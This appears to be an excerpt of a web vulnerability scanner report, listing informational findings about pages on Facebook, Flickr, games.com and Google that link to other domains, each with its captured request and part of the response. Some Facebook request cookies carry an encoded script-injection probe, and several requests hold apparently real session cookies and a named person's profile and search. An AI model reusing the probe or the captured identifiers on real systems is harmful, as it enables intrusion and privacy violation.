<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

16.77. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/terms.php?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

16.78. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/terms.php?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; wd=1022x1007; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf

Response

16.79. http://www.flickr.com/badge_code_v2.gne previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/badge_code_v2.gne

Issue detail

The page was loaded from a URL containing a query string:

http://www.flickr.com/badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00

The response contains the following link to another domain:

http://geo.yahoo.com/p?s=792600102&t=72fb4c3d82e1e2b081ceab63fe7a239c&r=http%3A%2F%2Fwww.tuaw.com%2Fhub%2Fapp-reviews&fl_ev=0&lang=en&intl=us

Request

GET /badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/hub/app-reviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 13:06:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www131.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 1470

var b_txt = '';

// write the badge


                               b_txt+= '<td align="center" valign="center" style="padding:0" class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/ph
...[SNIP]...
<span style="position:absolute;left:-999em;top:-999em;visibility:hidden" class="flickr_badge_beacon"><img src="http://geo.yahoo.com/p?s=792600102&t=72fb4c3d82e1e2b081ceab63fe7a239c&r=http%3A%2F%2Fwww.tuaw.com%2Fhub%2Fapp-reviews&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>
...[SNIP]...

16.80. http://www.games.com/game/family-feud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/game/family-feud/

Issue detail

The page was loaded from a URL containing a query string:

http://www.games.com/game/family-feud/?icid=maing-grid7%7Cmain5%7Cdl11%7Csec3_lnk1%7C60483

The response contains the following links to other domains:

http://about.aol.com/aolnetwork/mem_commitments
http://about.aol.com/aolnetwork/mem_tos
http://advertising.aol.com/brands/gamescom
http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames
http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames&game_id=54
http://b.trymedia.com/b/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup?curr_selected=USD
http://big.oscar.aol.com/gsixmoe?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif
http://big.oscar.aol.com/mitchjohnny5?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif
http://big.oscar.aol.com/suzyscorpion?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif
http://big.oscar.aol.com/tb00000000089591?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif
http://big.oscar.aol.com/wi00000000089916?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif
http://bigdownload.com/
http://casualgaming.biz/
http://d.trymedia.com/d/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup.rga?curr_selected=USD
http://eatps.web.aol.com:9000/open_web_adhoc?subtype=7051&sid=GAMES&game=335
http://gamezebo.com/
http://help.aol.com/help/product/games_com/
http://js.adsonar.com/js/adsonar.js
http://kids.aol.com/games/online-games
http://m.aol.com/games/
http://music.aol.com/
http://music.aol.com/radioguide/bb
http://music.aol.com/radioguide/bb/
http://o.aimcdn.net/e/1/00052b000000bb
http://o.aimcdn.net/e/1/00052b000004a7
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/casualgames/images/1-logo-brand-aol.gif
http://o.aolcdn.com/ch_onlinegames/game-images/335/150x150
http://o.aolcdn.com/ch_onlinegames/rating-images/13
http://o.aolcdn.com/dims/GAME/5/150/150/60/http:/o.aolcdn.com/ch_onlinegames/game-images/335/150x150
http://o.aolcdn.com/dims/GAME/5/298/178/60/http:/o.aolcdn.com/ch_onlinegames/game-images/4097/screenshot1
http://o.aolcdn.com/dims/GAME/5/298/178/60/http:/o.aolcdn.com/ch_onlinegames/game-images/788/screenshot1
http://o.aolcdn.com/dims/GAME/5/298/178/60/http:/o.aolcdn.com/ch_onlinegames/game-images/809/screenshot1
http://o.aolcdn.com/dims/GAME/5/48/48/60/http:/o.aolcdn.com/os/games/destiny/images/defaultAvatar
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js
http://o.aolcdn.com/os/games/destiny/images/defaultAvatar
http://o.aolcdn.com/os/games/images/favicon.ico
http://o.aolcdn.com/os/games/images/logos/twitter
http://o.aolcdn.com/os/games/images/modules/headers/GamesHereAndThere
http://o.aolcdn.com/os/games/images/modules/headers/PlayerCard
http://o.aolcdn.com/os/games/images/modules/icons/gamesdotcom-toolbar
http://o.aolcdn.com/os/games/scripts/initialize.js
http://o.aolcdn.com/os/games/styles/default.css
http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js
http://personals.aol.com/
http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=
http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=
http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=
http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=
http://shopping.aol.com/
http://shortcuts.com/?promo=0102239&ncid=aolsht00020000000033
http://television.aol.com/
http://toolbar.aol.com/games/download.html
http://twitter.com/games_aol
http://video.aol.com/searchresults?query=
http://webmail.aol.com/?_AOLLOCAL=mail
http://www.aol.com/
http://www.aol.com/aolnetwork/aol_pp.html
http://www.aol.com/aolnetwork/aolcom_terms.html
http://www.aol.com/aolnetwork/trademarks.html
http://www.aolhealth.com/
http://www.facebook.com/plugins/likebox.php?id=16327590002&width=292&connections=0&stream=false&header=false&height=165
http://www.free-games-flash.com/
http://www.gameproducer.net/
http://www.huffingtonpost.com/
http://www.kitchendaily.com/
http://www.mapquest.com/
http://www.moviefone.com/
http://www.popeater.com/
http://www.walletpop.com/
https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us

Request

GET /game/family-feud/?icid=maing-grid7%7Cmain5%7Cdl11%7Csec3_lnk1%7C60483 HTTP/1.1
Host: www.games.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 00:59:42 GMT; Path=/
Content-Length: 72850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/os/games/styles/default.css"/>
<link rel="shortcut icon" href="http://o.aolcdn.com/os/games/images/favicon.ico"/>
<link rel="canonical" href="http://www.games.com/game/family-feud/"/>
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js"></script>
...[SNIP]...


<link rel="image_src" href="http://o.aolcdn.com/ch_onlinegames/game-images/335/150x150"></head>
...[SNIP]...
<li><a href="http://www.aol.com/" title="<img class='branding' src='http://o.aolcdn.com/casualgames/images/1-logo-brand-aol.gif' alt='Aol.' title='Aol.' />" target = "_self"><img class='branding' src='http://o.aolcdn.com/casualgames/images/1-logo-brand-aol.gif' alt='Aol.' title='Aol.' /></a></li><li><a href="http://webmail.aol.com/?_AOLLOCAL=mail" title="Mail" target = "_self">Mail</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/" title="Huffington Post" target = "_self">Huffington Post</a>
...[SNIP]...
<li><a href="http://www.moviefone.com/" title="Movies" target = "_self">, Movies</a></li><li><a href="http://music.aol.com/" title="Music" target = "_self">, Music</a></li><li><a href="http://music.aol.com/radioguide/bb" title="Radio" target = "_self">, Radio</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<li><a href="http://help.aol.com/help/product/games_com/" title="Help" class = "help" target = "_self">Help</a></li><li><a href="http://m.aol.com/games/" title="Mobile" class = "help" target = "_self">Mobile</a>
...[SNIP]...
<li id="search-tab-Images"><a href="http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=" target="_blank" title="Images" onclick="return searchTarget('http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=', true, 'search-tab-Images');">Images</a></li>
<li id="search-tab-Local"><a href="http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=" target="_blank" title="Local" onclick="return searchTarget('http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=', true, 'search-tab-Local');">Local</a></li>
<li id="search-tab-News"><a href="http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=" target="_blank" title="News" onclick="return searchTarget('http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=', true, 'search-tab-News');">News</a></li>
<li id="search-tab-Video"><a href="http://video.aol.com/searchresults?query=" target="_blank" title="Video" onclick="return searchTarget('http://video.aol.com/searchresults?query=', true, 'search-tab-Video');">Video</a></li>
<li id="search-tab-Web"><a href="http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=" target="_blank" title="Web" onclick="return searchTarget('http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=', true, 'search-tab-Web');">Web</a>
...[SNIP]...
<li><a href="http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames" title="Cash Games" target = "_self">Cash Games</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<div class="img photo">
<img src="http://o.aolcdn.com/dims/GAME/5/150/150/60/http://o.aolcdn.com/ch_onlinegames/game-images/335/150x150" alt="Family Feud" title="Family Feud"/>
<form name="mod93_addNewGameRating" method="post" action="http://www.games.com/game/family-feud/?icid=maing-grid7%7cmain5%7cdl11%7csec3_lnk1%7c60483&" class="gameRating">
...[SNIP]...
<li class="download">
<a href="http://d.trymedia.com/d/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup.rga?curr_selected=USD" class="button">Download Trial</a>
...[SNIP]...
<li class="buy">
<a href="http://b.trymedia.com/b/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup?curr_selected=USD" class="button">Buy Now</a>
...[SNIP]...
<li class="cash"><a href="http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames&game_id=54" class="button">Cash Competition</a>
...[SNIP]...
<div class="tooltipBody"><img src="http://o.aolcdn.com/ch_onlinegames/rating-images/13" alt=""/>
<span class="label">
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aolcdn.com/dims/GAME/5/48/48/60/http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" border="0" alt="wi00000000089916 icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">wi00000000089916<img class="reviewerStatus" src="http://big.oscar.aol.com/wi00000000089916?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aimcdn.net/e/1/00052b000000bb" border="0" alt="mitchjohnny5 icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">mitchjohnny5<img class="reviewerStatus" src="http://big.oscar.aol.com/mitchjohnny5?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aolcdn.com/dims/GAME/5/48/48/60/http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" border="0" alt="gsixmoe icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">gsixmoe<img class="reviewerStatus" src="http://big.oscar.aol.com/gsixmoe?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aimcdn.net/e/1/00052b000004a7" border="0" alt="suzyscorpion icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">suzyscorpion<img class="reviewerStatus" src="http://big.oscar.aol.com/suzyscorpion?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aolcdn.com/dims/GAME/5/48/48/60/http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" border="0" alt="tb00000000089591 icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">tb00000000089591<img class="reviewerStatus" src="http://big.oscar.aol.com/tb00000000089591?on_url=http://www.aol.com/aim/gr/online.gif&off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<h3><img src="http://o.aolcdn.com/os/games/images/modules/headers/PlayerCard" alt="PlayerCard"/></h3>
...[SNIP]...
<div class="profile">
           <img class="icon" src="http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" alt=""/>
                   <span class="screenName">
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<a href="/game/burger-shop/" title="Burger Shop" rel="nofollow"><img src="http://o.aolcdn.com/dims/GAME/5/298/178/60/http://o.aolcdn.com/ch_onlinegames/game-images/788/screenshot1" alt=""/></a>
...[SNIP]...
<a href="/game/slots-lounge/" title="Slots Lounge" rel="nofollow"><img src="http://o.aolcdn.com/dims/GAME/5/298/178/60/http://o.aolcdn.com/ch_onlinegames/game-images/809/screenshot1" alt=""/></a>
...[SNIP]...
<a href="/game/the-book-of-treasures/" title="The Book of Treasures" rel="nofollow"><img src="http://o.aolcdn.com/dims/GAME/5/298/178/60/http://o.aolcdn.com/ch_onlinegames/game-images/4097/screenshot1" alt=""/></a>
...[SNIP]...
<h2><img align="middle" style="margin:5px 5px" src="http://o.aolcdn.com/os/games/images/modules/headers/GamesHereAndThere" alt="Follow Games.com on Twitter or Facebook. Install the Games.com tool bar"></h2>
...[SNIP]...
<h3><iframe src="http://www.facebook.com/plugins/likebox.php?id=16327590002&width=292&connections=0&stream=false&header=false&height=165" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:292px; height:65px;" allowTransparency="true"></iframe>
...[SNIP]...
<h3><img style="padding:7px; background:none; border:none;" src="http://o.aolcdn.com/os/games/images/logos/twitter" /><br>
       <span style="padding:7px;"><a href="http://twitter.com/games_aol">Follow us on Twitter!</a>
...[SNIP]...
<h3><img style="padding:7px; background:none; border:none;" src="http://o.aolcdn.com/os/games/images/modules/icons/gamesdotcom-toolbar"><br>
<span style="padding:7px;"><a href="http://toolbar.aol.com/games/download.html">Download the Games.com Toolbar</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<li id="footer-search-tab-Images"><a href="http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=" target="_blank" title="Images" onclick="return searchTargetFt('http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=', true, 'footer-search-tab-Images');">Images</a></li>
<li id="footer-search-tab-Local"><a href="http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=" target="_blank" title="Local" onclick="return searchTargetFt('http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=', true, 'footer-search-tab-Local');">Local</a></li>
<li id="footer-search-tab-News"><a href="http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=" target="_blank" title="News" onclick="return searchTargetFt('http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=', true, 'footer-search-tab-News');">News</a></li>
<li id="footer-search-tab-Video"><a href="http://video.aol.com/searchresults?query=" target="_blank" title="Video" onclick="return searchTargetFt('http://video.aol.com/searchresults?query=', true, 'footer-search-tab-Video');">Video</a></li>
<li id="footer-search-tab-Web"><a href="http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=" target="_blank" title="Web" onclick="return searchTargetFt('http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=', true, 'footer-search-tab-Web');">Web</a>
...[SNIP]...
<li><a href="http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames" title="Cash Games" target = "_self">Cash Games</a>
...[SNIP]...
<li><a href="http://kids.aol.com/games/online-games" title="Free Kids Games" target = "_self">Free Kids Games</a>
...[SNIP]...
<li><a href="http://www.popeater.com/" title="Celebrity News" target = "_self">Celebrity News</a>
...[SNIP]...
<li><a href="http://www.moviefone.com" title="Movies" target = "_self">Movies</a></li><li><a href="http://music.aol.com/" title="Music" target = "_self">Music</a></li><li><a href="http://television.aol.com/" title="TV" target = "_self">TV</a></li><li><a href="http://music.aol.com/radioguide/bb" title="Online Radio" target = "_self">Online Radio</a>
...[SNIP]...
<li><a href="http://www.kitchendaily.com/" title="Food" target = "_self">Food</a></li><li><a href="http://shopping.aol.com/" title="Shopping" target = "_self">Shopping</a></li><li><a href="http://music.aol.com/radioguide/bb/" title="Online Music" target = "_self">Online Music</a>
...[SNIP]...
<li><a href="http://www.aolhealth.com/" title="Health & Diet" target = "_self">Health & Diet</a>
...[SNIP]...
<li><a href="http://personals.aol.com/" title="Personals" target = "_self">Personals</a>
...[SNIP]...
<li><a href="http://shortcuts.com/?promo=0102239&ncid=aolsht00020000000033" title="Free Coupons" target = "_self">Free Coupons</a>
...[SNIP]...
<li><a href="http://www.mapquest.com/" title="MapQuest" target = "_self">MapQuest</a></li><li><a href="http://www.walletpop.com/" title="WalletPop" target = "_self">WalletPop</a></li><li><a href="http://bigdownload.com" title="PC Games Demo" target = "_self">PC Games Demo</a>
...[SNIP]...
<li><a href="http://gamezebo.com" title="Casual Games Reviews" target = "_self">Casual Games Reviews</a>
...[SNIP]...
<li><a href="http://CasualGaming.biz" title="Casual Games News" target = "_self">Casual Games News</a>
...[SNIP]...
<li><a href="http://advertising.aol.com/brands/gamescom" title="Advertise on Games.com" target = "_self">Advertise on Games.com</a>
...[SNIP]...
<li><a href="http://www.gameproducer.net/" title="GameProducer.net" target = "_self">GameProducer.net</a>
...[SNIP]...
<li><a href="http://www.free-games-flash.com/" title="Free Flash Games" target = "_self">Free Flash Games</a>
...[SNIP]...
<li><a href="http://www.aol.com/aolnetwork/aolcom_terms.html" title="Terms of Use" target = "_self">Terms of Use</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/mem_tos" title="Updated Terms of Service" target = "_self">Updated Terms of Service</a>
...[SNIP]...
<li><a href="http://www.aol.com/aolnetwork/aol_pp.html" title="Privacy Policy" target = "_self">Privacy Policy</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/mem_commitments" title="Updated Privacy Policy" target = "_self">Updated Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.aol.com/aolnetwork/trademarks.html" title="Trademarks" target = "_self">Trademarks</a>
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://eatps.web.aol.com:9000/open_web_adhoc?subtype=7051&sid=GAMES&game=335"></script><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

16.81. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan

The response contains the following links to other domains:

http://controlshift.aol.com/careers
